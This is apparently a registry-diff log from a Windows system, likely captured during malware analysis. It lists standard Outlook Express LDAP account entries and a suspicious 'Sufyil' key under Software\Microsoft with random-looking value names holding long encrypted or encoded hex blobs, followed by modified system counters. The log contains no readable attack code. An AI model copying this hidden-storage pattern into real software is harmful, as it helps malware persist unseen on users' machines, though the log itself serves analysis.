HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\WhoWhere\LDAP Simple Search: 0x00000001
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\WhoWhere\LDAP Logo: "%ProgramFiles%\Common Files\Services\whowhere.bmp"
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\VeriSign\LDAP Server ID: 0x00000002
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\VeriSign\Account Name: "VeriSign インターネット ディレクトリ サービス"
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\VeriSign\LDAP Server: "directory.verisign.com"
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\VeriSign\LDAP URL: "http://www.verisign.com"
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\VeriSign\LDAP Search Return: 0x00000064
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\VeriSign\LDAP Timeout: 0x0000003C
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\VeriSign\LDAP Authentication: 0x00000000
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\VeriSign\LDAP Search Base: "NULL"
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\VeriSign\LDAP Simple Search: 0x00000001
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\VeriSign\LDAP Logo: "%ProgramFiles%\Common Files\Services\verisign.bmp"
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\Bigfoot\LDAP Server ID: 0x00000001
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\Bigfoot\Account Name: "Bigfoot インターネット ディレクトリ サービス"
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\Bigfoot\LDAP Server: "ldap.bigfoot.com"
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\Bigfoot\LDAP URL: "http://www.bigfoot.com"
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\Bigfoot\LDAP Search Return: 0x00000064
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\Bigfoot\LDAP Timeout: 0x0000003C
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\Bigfoot\LDAP Authentication: 0x00000000
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\Bigfoot\LDAP Simple Search: 0x00000001
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\Bigfoot\LDAP Logo: "%ProgramFiles%\Common Files\Services\bigfoot.bmp"
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\Active Directory GC\LDAP Server ID: 0x00000000
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\Active Directory GC\Account Name: "Active Directory"
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\Active Directory GC\LDAP Server: "NULL"
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\Active Directory GC\LDAP Search Return: 0x00000064
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\Active Directory GC\LDAP Timeout: 0x0000003C
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\Active Directory GC\LDAP Authentication: 0x00000002
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\Active Directory GC\LDAP Simple Search: 0x00000000
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\Active Directory GC\LDAP Bind DN: 0x00000000
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\Active Directory GC\LDAP Port: 0x00000CC4
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\Active Directory GC\LDAP Resolve Flag: 0x00000001
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\Active Directory GC\LDAP Secure Connection: 0x00000000
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\Active Directory GC\LDAP User Name: "NULL"
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\Active Directory GC\LDAP Search Base: "NULL"
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\PreConfigVer: 0x00000004
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\PreConfigVerNTDS: 0x00000001
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Server ID: 0x00000004
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Default LDAP Account: "Active Directory GC"
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Sufyil\16c6jhji: 10 38 3A 8C EC 37 4D 37 6B 85 7C 00 79 57
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Sufyil\1b52cjj4: 0x8C5B382D
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Sufyil\2b4gb2j8: 61 31 68 62 6A 44 34 4F 4B 54 63 65 68 55 30 41
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Sufyil\12jcjhb1: 7C 38 5B 8C F9 07 57 67 98 DF 13 61 02 BC EB 08 51 5E CB CC 76 AA D7 50 FE 83 D2 B6 EA 82 D3 DB 63 B8 8B 43 DC E2 C2 CB CC B6 70 ED 1C 61 08 D8 6A 7E A0 5D 57 FA DE C5 AF D7 91 F1 D2 AD 6B 2F A7 88 0B 28 97 70 54 63 34 38 6B 93 6F 61 8C 84 3F E7 95 23 5A BC 49 F9 A2 C1 C4 61 D9 31 F2 C9 2E E6 EF 1E 65 73 2A C2 5F 1A 9E C4 0D 99 CC AF 6D EE C4 77 65 CC 74 A5 BE 18 C3 1E 66 EA 09 47 A0 C2 80 26 69 BA A4 D3 8F C8 18 DB A9 00 60 95 2D E7 C0 3B 7B 15 EC 06 01 62 0B BA 53 B7 F4 72 5A 61 3B 87 4F B4 84 5F B5 FF EB 7D A3 BF 6C 82 18 17 8A 58 A5 CC F6 0E 1E 8E 6C 10 3C 48 48 C7 DB AB 86 68 7A 58 22 A1 E1 BB 7B B5 10 D5 FB F8 37 90 90 A8 A6 C8 8A B0 90 0C 2C A5 9B BD 0B BE E2 2A 44 E3 10 07 C7 60 4E 16 C8 3A D8 08 C7 B8 C3 5A 5E 26 B3 D9 4B 93 8C 67 2B 32 DF F8 5D 42 BB 56 79 28 74 3D DD 9A 94 A4 D7 94 B0 D9 54 C7 F5 25 4C A7 DD 56 4D 9A 34 54 1E EE 04 A0 5D 6B F0 9A 85 67 C4 14 1B D1 F9 CB 97 B3 7D AD 83 0D 7A 26 3D DE 56 21 73 A3 F1 E3 AA 93 5D B2 3B BF 51 7C 98 EF AD 1B D6 0B 9D 36 22 F9 9E F8 8E 59 2F DD F2 F5 85 20 19 7C A5 40 E0 4B 21 A2 70 B5 6B C8 B0 B9 1C 47 3D DC 21 69 90 07 5B 9F AF 86 CA 75 6C 47 7C A5 D3 AF D5 4C 93 D0 A6 F5 F6 EB 2F D9 99 13 DD 6C 66 66 AE 7C 10 F8 D2 C1 66 E7 D5 75 3D 4D 2E 91 77 B4 20 A0 DA A2 A7 54 6C 22 B2 05 14 65 E2 74 36 1F 0D BA 3E DF 0D B9 71 A3 FE 2C 7D B3 A1 2C 17 4D 95 EC A4 99 DA C8 13 DE EE DA FE 75 E8 84 92 D1 22 4D 0B 88 66 67 C6 E1 1C 39 F1 26 0C 12 07 61 68 A0 87 6B BE 9A 4C 9D BB 82 F6 97 AB 39 AD 37 0D A6 1A 4A B0 9A 05 B1 6C 7A FD D5 1A 75 5A A4 F8 97 D6 82 93 5C 5D F2 D3 AC 84 7F 61 A1 7C 84 C5 67 7E 84 D9 57 02 F2 53 32 DA 75 4C 31 EB 76 A5 D3 27 18 58 60 8E 56 7E 71 C6 58 4E B0 34 AF 15 C6 B2 06 3E D8 63 D8 FB 65 65 47 BC 31 97 EC BC CD 20 BF DB 20 49 7A AD 58 E8 7C 77 C0 56 4C 79 B6 1D F3 13 09 91 B8 D0 30 3F 3B B0 81 D1 5C 1C 96 D4 A4 A9 9F 43 DC 0B C5 1A 08 37 96 66 78 62 33 CA 89 C9 4D 1D 55 50 CD 6E B0 38 51 EE F3 9E A9 7C 7A 22 1E C9 55 AE 5C 77 86 5B 93 F6 57 41 F9 14 5E A4 E4 B5 87 0C FD 52 99 AF 06 3B 35 4F 3F 52 ED B6 5A E3 48 C2 A7 5B 63 A6 21 33 3D 32 D4 8F 2F D2 24 3E 74 79 1E D9 E0 60 40 59 26 99 21 0E FD 55 69 82 D3 0E 93 52 33 0A A5 F0 8E BD 17 29 B9 8D C8 E1 A6 63 CB D3 64 AC 61 42 50 A6 CB CC 88 C7 67 C0 C0 D6 41 98 47 00 BF CD 93 29 ED 67 3F F1 B2 4F 0E EA 8E A6 84 C2 5F B5 2E DC 36 C4 8A FF 81 E3 60 C3 96 A2 7B 6C 98 69 3B DD E2 46 73 2F 3C F5 8A 2F 32 D2 63 24 3E 6F F0 7A D3 2F B3 22 1F 65 88 50 78 A1 C9 B0 46 B6 E2 20 46 87 0F 3B A3 DD 0A AA 6B C9 ED EE 71 B5 E7 F6 21 E8 F2 5C 8F FC C4 9A AB 8D 25 A5 C3 00 75 B5 BC FC 19 0E F0 29 BE A5 D0 DE 87 D1 09 24 A6 04 ED 1E 29 17 00 19 14 3C 2F F6 B3 FF 71 FE 1B 76 90 07 44 C2 8A EA F5 31 60 D4 A8 86 E2 95 C4 C3 EA 06 DA 5C C2 42 50 EA 4A 03 0D E8 D9 42 2A 26 C7 40 D7 F5 A0 CC 24 BE E2 64 16 80 71 D8 27 41 6A 30 6D EE 7E 8C DC A2 7A 05 A0 94 E1 EE 83 BE 0A 23 DB 81 FA 0C E8 F8 0A 30 34 19 15 06 D7 79 77 72 A8 0A CD 24 93 74 94 0F 74 A2 0F 5A C9 C7 00 8C 51 FD ED E8 FC 49 89 BC 6B 0D B8 0F 5D CE 9E BB FA 63 FE 36 29 E5 4F 1D 31 6D 85 67 44 02 06 CB FC 1D A5 AC 15 AB BC 86 6B A3 54 99 A2 27 3D 29 42 99 71 DC 3B 06 5F 64 32 1F 1C 24 BD AD 7A 0C 80 C9 7C AE 19 29 08 45 05 C8 35 6D CA AC B1 BC 02 94 38 D7 FD 95 F3 11 0B 78 63 BA F4 89 39 56 4D 47 23 C4 44 1A 7A C7 54 75 8E 0F 5F 61 4A 86 65 17 8C B4 6D 18 5B D3 19 5F CF E1 2A FE 27 DD 98 13 94 9F CD C4 9B 7B AA FB 43 48 1C F2 BD 05 C2 BB EF F1 40 9F 61 4E D9 E7 D8 AF DF CE F7 03 B7 BC DD 24 CD 30 92 9F EE 3A 36 37 2D F5 54 EC DA CC 2D 21 1E 9C 00 64 A9 A0 F6 6C 10 78 A6 0C 63 E3 48 41 49 82 B8 6B 91 B9 7A 3C 80
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Sufyil\7ec4g79: 66 44 68 62 6A 49 49 33 4B 54 63 66 74 55 77 41 54 6C 66 46 4F 52 36 52 73 37 6A 58 6C 63 66 5A 45 39 4E 33 56 58 6E 39 6C 7A 77 69 6E 6F 5A 47 79 4D 6A 35 49 62 2B 32 63 4F 30 63 59 51 6A 59 61 6E 36 67 58 56 66 36 33 73 57 76 31 35 48 71 52 34 48 6D 6F 5A 65 75 79 41 2F 53 36 6A 61 4A 4E 63 39 34 44 38 76 53 59 4D 36 73 59 37 52 6C 65 71 74 61 46 54 4B 31 78 6A 71 65 50 55 35 66 54 48 5A 59 70 4F 63 4B 67 79 74 55 6E 43 4E 78 49 76 61 75 4C 51 43 78 6F 37 77 37 69 4F 4D 67 51 2B 55 63 44 41 5A 51 54 73 4D 51 6D 5A 35 6E 64 61 5A 6F 4F 79 7A 7A 77 6A 67 2B 48 71 32 58 58 34 46 42 55 50 63 54 33 62 33 34 68 30 77 39 4C 72 52 32 6D 79 4E 4B 4F 4E 66 36 7A 71 51 69 58 6B 52 73 4F 38 6A 4C 43 4F 43 4D 56 41 48 44 32 49 54 51 36 37 67 6F 4E 62 6B 65 6A 65 67 59 55 57 6B 76 6A 51 41 5A 67 56 6B 7A 32 68 77 67 4D 4F 63 32 6B 55 52 55 77 6F 74 66 57 49 55 7A 37 2B 2B 75 6F 4F 49 69 51 68 62 63 6C 34 42 31 70 44 63 4D 6B 48 34 57 49 7A 56 6F 37 48 71 69 49 74 46 57 45 59 61 31 58 66 39 43 47 33 39 55 31 71 4A 37 2F 64 74 52 6D 41 2B 66 4F 4A 34 4D 6B 54 72 53 45 6E 62 2F 6E 79 38 75 47 71 42 2F 55 61 75 4F 68 51 33 75 79 77 6F 59 76 38 54 51 76 34 34 67 35 64 53 51 59 34 34 53 47 65 44 4C 4F 32 75 78 75 6D 34 43 55 49 48 46 4A 5A 34 45 71 57 4D 4F 6B 31 32 79 4F 37 39 52 66 4A 6A 76 72 52 76 57 43 35 30 32 49 76 6D 65 2B 49 35 5A 4C 39 33 79 39 51 41 51 5A 79 77 68 4C 50 34 50 6F 64 66 59 68 6F 2B 30 57 68 6D 47 30 37 38 65 62 75 72 52 71 78 43 50 46 31 33 6B 48 47 78 48 66 4B 58 54 72 39 56 4D 6B 39 43 6D 39 66 62 72 4C 39 6D 5A 45 39 31 73 5A 6D 61 75 66 42 44 34 56 2F 45 59 74 31 4E 35 4D 50 74 35 50 62 46 44 56 6D 72 55 58 4D 51 33 68 33 56 75 32 43 59 61 67 4E 66 58 57 52 62 33 50 74 38 4E 75 58 47 6A 2F 69 78 39 73 36 45 73 46 30 32 56 37 4B 53 5A 32 73 67 54 33 75 37 61 2F 6E 56 75 74 4F 79 42 6F 46 39 56 45 69 70 76 6E 39 6F 7A 70 54 67 34 48 76 36 58 46 53 69 77 77 44 6E 79 4B 35 73 6B 4C 65 48 32 6C 70 73 34 72 54 63 4E 70 70 70 76 61 6E 67 7A 70 66 31 66 5A 37 4A 33 72 57 62 4B 56 42 69 67 79 6C 50 34 66 31 75 74 33 4C 64 6A 41 58 49 47 61 72 46 46 56 70 2B 31 46 70 5A 51 2B 67 30 62 45 53 7A 48 2B 52 69 63 65 4A 62 46 72 75 52 43 62 4B 46 32 58 41 79 37 77 4F 34 38 53 73 68 69 48 65 50 4F 4F 75 33 59 64 4D 6E 38 58 32 2F 65 75 72 72 48 68 52 61 4B 4F 31 34 72 75 2B 69 2F 6B 59 45 48 62 65 4F 35 30 58 4F 4E 66 77 6E 53 49 4C 31 66 4D 77 2F 65 55 35 47 2B 59 2B 49 5A 55 62 64 33 62 65 55 39 48 53 6D 66 72 4D 6E 38 65 4C 37 38 77 64 43 63 43 66 5A 45 74 67 53 36 59 67 67 65 58 2F 63 74 5A 5A 45 78 33 68 6D 5A 34 34 5A 4B 6C 71 44 7A 4B 4E 37 77 76 31 6C 36 4B 6F 32 74 66 42 42 30 41 42 66 77 2F 57 58 63 78 35 74 72 46 48 47 5A 63 6E 4D 59 6E 42 6C 52 6D 48 43 75 71 6C 57 31 70 6E 67 41 53 6F 4B 59 73 69 6E 69 59 51 31 6B 46 4D 34 7A 43 54 57 62 50 31 30 7A 41 52 5A 51 54 42 38 67 68 79 6A 33 45 38 69 61 4B 71 44 42 55 70 62 43 72 44 58 39 66 46 6A 6B 58 68 38 77 65 6B 4D 47 42 72 37 63 77 66 54 55 50 71 64 67 79 34 34 31 4B 4A 48 4F 73 65 71 61 61 5A 59 4A 6D 50 6D 38 2B 43 71 73 6E 55 66 67 72 6F 78 6A 79 6D 50 4B 67 65 77 64 76 43 6B 34 68 45 42 45 51 4F 4A 69 71 53 69 48 44 4A 57 61 62 75 4B 34 42 52 47 67 39 4C 47 39 5A 51 46 44 4F 45 47 49 50 51 5A 51 79 6D 6A 61 76 30 42 77 7A 79 75 42 39 6C 42 4B 77 44 44 4A 37 65 35 78 74 65 66 32 49 65 6A 79 58 49 2F 38 78 4A 71 72 6A 53 57 6C 77 77 42 31 74 62 7A 38 47 59 54 41 56 2B 34 6B 75 6E 59 70 76 44 65 6B 75 58 2B 2B 57 76 67 42 53 47 4B 43 70 72 6D 76 67 72 48 4E 31 57 78 73 6F 51 64 45 77 6F 72 71 39 54 46 67 31 4B 69 47 34 70 58 45 77 2B 6F 47 32 6C 7A 43 51 6C 44 71 53 67 4D 4E 59 2B 6B 38 65 71 59 49 76 47 44 32 55 51 2F 64 49 4D 45 34 57 75 49 6D 64 44 55 6F 74 6E 66 70 4C 64 66 78 4F 47 77 4F 42 61 43 55 34 65 36 44 76 67 6F 6A 32 34 48 36 44 4F 6A 34 43 6A 41 30 47 52 55 47 31 33 6C 33 63 71 69 42 2F 56 76 7A 38 6B 78 64 4C 6B 51 6B 57 33 69 44 66 72 70 51 46 4B 35 67 56 45 33 31 67 4C 4C 35 56 34 43 4B 62 37 31 57 47 31 77 5A 43 69 6E 6C 54 78 30 78 62 59 56 6E 52 41 49 47 79 2F 77 64 70 61 77 56 71 2F 31 38 66 46 44 49 64 4D 77 6F 56 55 56 6E 56 65 69 4D 70 76 48 4D 59 7A 6C 48 44 55 68 73 4C 78 63 38 55 53 75 55 64 30 2F 52 51 35 43 30 30 48 66 39 39 4D 66 43 4D 4F 50 6B 64 37 4E 37 78 5A 62 6E 41 43 58 70 79 7A 4F 52 41 4D 7A 65 30 76 55 6B 52 56 78 4F 65 31 49 79 6C 79 42 6E 74 6F 4A 5A 34 53 59 32 51 77 36 30 4B 38 30 46 77 37 68 31 30 42 59 65 4E 4A 45 64 7A 2B 4B 30 34 79 59 36 77 6E 36 6B 54 77 77 55 67 5A 45 2F 71 41 51 49 4B 4C 45 4F 31 45 71 74 54 74 64 42 58 58 77 72 4D 79 2F 75 64 75 59 63 30 6E 68 66 62 42 63 64 2B 36 6F 6D 41 30 76 33 79 76 4E 68 54 45 6E 4E 77 32 73 70 77 52 2B 59 4F 34 76 48 48 54 66 5A 54 63 50 33 59 6B 33 42 73 2B 57 76 77 67 37 4F 54 63 4C 62 6C 68 6F 47 38 46 53 75 4E 36 75 77 54 56 41 33 63 35 4C 6E 4E 48 66 55 31 4E 4D 44 39 59 4F 74 76 79 6C 39 59 6F 33 72 4F 69 4B 55 44 49 2B 35 43 2B 61 70 30 69 4D 73 37 56 59 50 76 52 2B 54 50 30 2B 55 5A 77 74 70 33 6E 5A 76 38 6F 50 47 62 42 52 45 45 39 4C 7A 6F 57 56 5A 44 7A 42 71 63 6C 7A 31 37 65 48 66 54 4B 50 46 71 53 57 59 35 54 42 33 32 72 2B 2B 2B 34 65 4B 79 30 6A 66 6D 68 44 6C 64 4F 2F 38 56 48 46 6E 6F 34 77 78 33 2F 4D 2F 4D 79 37 33 64 6F 2B 2F 55 71 79 2F 4C 4A 5A 75 62 75 4A 44 62 36 36 62 72 51 32 53 43 4E 50 52 62 4F 67 39 6B 37 6A 61 67 56 49 78 57 58 31 31 75 53 48 58 6F 51 61 6A 63 75 4B 48 58 33 69 74 2F 77 5A 33 6B 4E 50 36 6C 4A 38 78 67 30 62 76 6F 50 59 32 33 39 41 54 63 57 37 49 53 64 4F 45 4C 2B 4D 49 41 6B 44 63 61 49 76 4E 50 45 4C 45 42 72 77 37 72 4C 79 57 4D 4F 41 73 4F 44 30 2B 72 4F 73 6E 6B 30 54 4A 30 6E 59 50 41 4D 45 69 31 57 47 52 33 4F 4A 35 56 55 51 30 73 51 73 48 62 38 4A 69 31 76 66 6F 34 31 34 44 66 63 4B 65 6E 6D 66 68 76 33 73 79 7A 76 2B 57 59 2B 2F 70 6D 37 52 49 49 71 72 47 65 4A 43 42 67 45 4F 6B 32 31 38 4E 2B 76 37 63 45 4E 71 53 56 2F 4B 4C 52 35 66 33 37 56 51 4E 49 61 34 57 49 6D 35 33 2F 6C 59 42 78 71 6D 70 35 76 31 74 46 32 78 30 78 6D 53 46 47 45 33 52 31 77 4A 47 35 36 7A 64 32 41 4B 35 37 68 39 38 65 4C 39 36 33 72 79 4E 6B 52 4B 68 4E 61 30 6B 55 7A 4E 30 45 75 67 41 2B 56 43 55 52 74 2F 6E 4B 36 45 2F 62 51 70 45 2B 4F 6E 66 4D 37 61 2F 47 66 4F 2F 76 65 51 51 4B 78 61 46 30 62 73 69 77 7A 47 6F 78 4B 38 53 50 2F 43 54 56 2F 55 52 61 37 58 2F 42 49 63 43 43 6B 6D 5A 41 6B 4A 38 65 35 50 62 2B 54 55 72 4B 79 68 42 47 56 33 4B 6A 44 41 62 54 42 42 59 63 68 4C 6B 6F 78 30 48 2F 4C 65 38 58 59 34 77 39 73 63 35 68 47 68 67 78 6D 4A 55 74 69 6C 50 57 6D 45 58 74 59 62 57 44 74 42 2B 4B 36 74 45 45 62 35 58 52 30 33 51 38 4E 46 32 50 39 51 52 4E 75 6A 57 44 6F 77 46 43 38 56 2B 57 50 4A 32 68 64 44 57 63 50 58 48 6B 4E 56 4D 6F 78 2F 6E 54 65 41 64 58 44 34 78 45 53 76 55 57 2B 67 59 51 45 4A 77 38 38 42 56 39 55 33 55 71 6F 58 50 41 46 34 37 4A 6D 6E 63 6B 38 49 65 79 64 6D 65 51 31 48 6C 70 75 45 2F 6C 4D 37 2B 41 44 31 36 78 4D 69 59 46 53 61 48 62 67 4B 5A 48 71 6A 32 67 4A 53 2B 77 67 38 62 4C 56 2B 78 6F 4C 4F 6E 59 38 54 41 41 6C 79 50 6A 4C 7A 77 50 6E 69 67 6B 50 39 75 6B 59 4C 52 43 79 6F 2F 51 45 2F 57 78 31 30 79 47 69 2B 63 52 45 47 49 78 48 73 38 33 57 7A 77 67 76 42 56 68 45 54 43 66 59 61 4A 30 33 45 63 51 73 52 72 67 6F 43 76 47 75 39 51 49 55 57 43 52 59 35 31 6B 6B 6E 65 6F 39 31 5A 45 77 70 4D 36 64 4F 48 50 4C 45 76 54 2F 4A 70 4F 74 68 65 30 62 73 35 47 4D 74 36 49 6D 44 4C 77 31 79 54 75 47 59 53 32 50 64 70 55 4B 61 47 39 55 73 64 68 58 4E 2F 2F 6E 75 49 35 79 6E 73 62 48 4E 4F 50 42 32 7A 41 68 77 6C 36 32 51 51 2F 72 67 49 54 6E 69 74 65 2F 71 63 79 37 6E 34 58 51 46 62 6B 6B 6A 54 7A 66 59 36 52 2B 71 6E 69 49 31 34 66 55 4B 4A 61 77 3D 3D
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Sufyil\1ccc3cfg: 9A A2 3F 43 D5 D4 29 01 0A 77 93 11 1E BD CB F6 47 7D 44 34 F9 57 05 D6 50 A6 04 20 31 A0 C6 83 8F 80 3D 1A 68 60 03 5F 84 3D AC 6C B2 88 18 88 99 2B A0 5D 56 FA DE D5 60 D6 91 F1 63 99 15 7F 5C F2 20 71 D5 02 D6 6E AC 91 73 DC 53 DB 47 F4 B3 CF 90 56 06 13 98 0B 1E BC DF CA 0F B7 06 3A 13 57 8F 81 02 CF D2 65 9B 8D 0E 73 99 06 7A E8 56 FE 55 72 6A F0 3A 4F 71 88 7C AB 6C E6 FF 91 4B 67 52 B1 56 6D AF 13 17 A5 54 4C F6 AB 35 D5 35 F3 91 78 F4 BC 49 8D 2D C0 11 7A 6D D0 DE DF E7 BF 97 6C D7 49 D9 C6 A8 BB BD 34 89 67 09 9E CD 25 1E 58 3F 6B 5B AD 80 F5 01 37 E4 A5 43 59 5A 2A 24 4F 0D BC 9B 5B 82 2F 55 DD AF 89 B1 B4 08 46 53 D3 F7 61 FC 46 9D D0 94 81 C7 EA 48 22 D9 C2 B8 B1 E6 97 E3 89 24 D0 5E CB F6 8F 43 C1 31 24 6D A0 90 59 DF FB 70 F3 A1 5C 78 73 B9 00 93 5B A0 87 1F 34 3F 13 A6 71 8A DF 32 3A D5 D0 28 92 83 34 2D FE B6 FD AD 62 81 C6 E6 DE B8 FE A6 ED BC 9C AB AA 27 57 90 60 14 A9 5E 56 32 82 43 2B 15 7A 80 3F 25 C8 DF 42 83 EF 35 03 7D 93 FA DC CD B7 A7 AF 0E A3 F3 1B 40 DA 3F 3F 73 F3 92 F6 F4 0C 13 94 47 BB 82 08 D7 D2 BD 81 4F 09 AF 1E 67 61 3A 06 1E B8 C0 22 8E 4B 07 08 C3 D0 99 A3 9A A0 15 BE 12 49 BC 8A 2A DB 37 A2 DA BE 17 34 9D 14 70 CD 91 22 3D 72 4B 04 3C B6 FC 5D D3 B0 D0 CD 52 A8 1C F6 EC E0 F3 E5 3C D2 08 06 BA 67 D3 0F 76 6A BB DF 55 77 AC 0C A5 B1 12 7E AC EA C1 4F 91 A4 D8 D8 33 6C EE C6 6D 8B 42 25 F2 8C 81 29 44 B5 8E D8 C5 53 E1 09 74 77 06 E8 91 25 34 B5 43 ED A3 2D 76 1E 02 A8 39 F3 1F 8C AB F2 B3 EA B1 6F 6B 21 83 DC 58 9E F5 75 D2 2B 91 DA 48 5C 36 B6 B0 43 6A 4B A7 5B EA E5 D3 2D 54 AF 2F 45 48 44 C7 34 0D FE FA 51 F3 46 F6 A4 AF 0D 1B 11 2C C7 CD EB 8D EC 27 2F 58 60 8E CA DD 7A 97 DF A3 E0 3A 71 EC DC F1 93 87 CC 2B 42 4B 37 37 D6 9E 08 A1 2B 8B E5 56 67 93 69 2B 20 6C 4A 81 8E 04 04 CC 9B BF C7 ED DF 8B 33 A9 0C 8E 21 75 A1 67 FE D0 5C 1C 96 D5 A4 A9 DF D2 DC 0B C5 AF 08 37 96 6C 89 DF 72 AB 7E EC 51 10 9D 21 4B 0D 4D 16 C5 21 0A B0 00 2F 23 3D 49 76 47 3B 62 22 47 B9 68 46 5C 8F 1E 8F 94 BB D5 73 31 F8 B7 70 94 56 BC 15 38 B0 45 3A BE 48 10 F5 11 DF 4C 9A ED 39 F0 56 31 47 88 91 6C CA 10 D7 6B DF 8D F6 3D 7C 26 B2 27 67 DB 3D 97 4F D1 68 CC EF A0 C7 4D B0 A1 67 3D 22 72 BD 3B 22 FB 13 E2 F5 F9 01 73 23 1E 03 17 1B 42 A5 6F C2 C4 12 14 C6 7C FF C8 76 FC E3 A8 C0 F0 AA AB 69 39 8D 3B 93 6B 1F 03 83 46 68 5B 05 5F C4 8B FF 81 A3 BF C3 96 A2 3E 6D 98 69 B4 04 FC 2D 72 88 F3 49 8D D0 06 71 95 95 46 55 8D 97 FA 80 C3 10 56 2D 54 0F

----------------------------------
Values modified:23
----------------------------------
HKLM\SOFTWARE\Microsoft\Cryptography\RNG\Seed: 90 30 12 62 DD 7F 82 8B 16 05 C8 00 DB B4 6A A5 46 4D 70 E1 BF D3 DF C0 7F 53 19 88 0A 81 8E 16 41 0C 73 6B 8C 8D 74 B2 A2 94 6D 55 8D DC 9D 40 85 6C B0 1F B7 5F A2 35 77 97 7A D6 D7 26 EE 09 C9 06 26 2A 26 AA B5 59 51 09 CF 32 62 5B 0F 61
HKLM\SOFTWARE\Microsoft\Cryptography\RNG\Seed: 20 96 FE 0B A2 D7 98 9E C7 C0 44 9D 8F 5B 02 79 62 CE 07 0C 38 C7 E1 A7 C3 61 66 55 B8 D2 89 FB 8C AA 14 30 8F C4 BA 33 00 08 05 78 1F 55 8D 14 8F 02 4F 97 D4 75 FF AA CA 99 B1 97 E8 8C 9B 21 79 3E D3 02 C1 54 C3 8C FE 6C 35 6F C0 C8 03 C6
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Prefetcher\TracesProcessed: 0x00000015
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Prefetcher\TracesProcessed: 0x0000002B
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Prefetcher\TracesSuccessful: 0x00000008
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Prefetcher\TracesSuccessful: 0x0000000C
HKLM\SYSTEM\ControlSet001\Services\kmixer\Enum\Count: 0x00000000
HKLM\SYSTEM\ControlSet001\Services\kmixer\Enum\Count: 0x00000001
HKLM\SYSTEM\ControlSet001\Services\kmixer\Enum\NextInstance: 0x00000000
HKLM\SYSTEM\ControlSet001\Services\kmixer\Enum\NextInstance: 0x00000001
HKLM\SYSTEM\ControlSet001\Services\SharedAccess\Epoch\Epoch: 0x00000027
HKLM\SYSTEM\ControlSet001\Services\SharedAccess\Epoch\Epoch: 0x0000002A
HKLM\SYSTEM\CurrentControlSet\Services\kmixer\Enum\Count: 0x00000000
HKLM\SYSTEM\CurrentControlSet\Services\kmixer\Enum\Count: 0x00000001
HKLM\SYSTEM\CurrentControlSet\Services\kmixer\Enum\NextInstance: 0x00000000
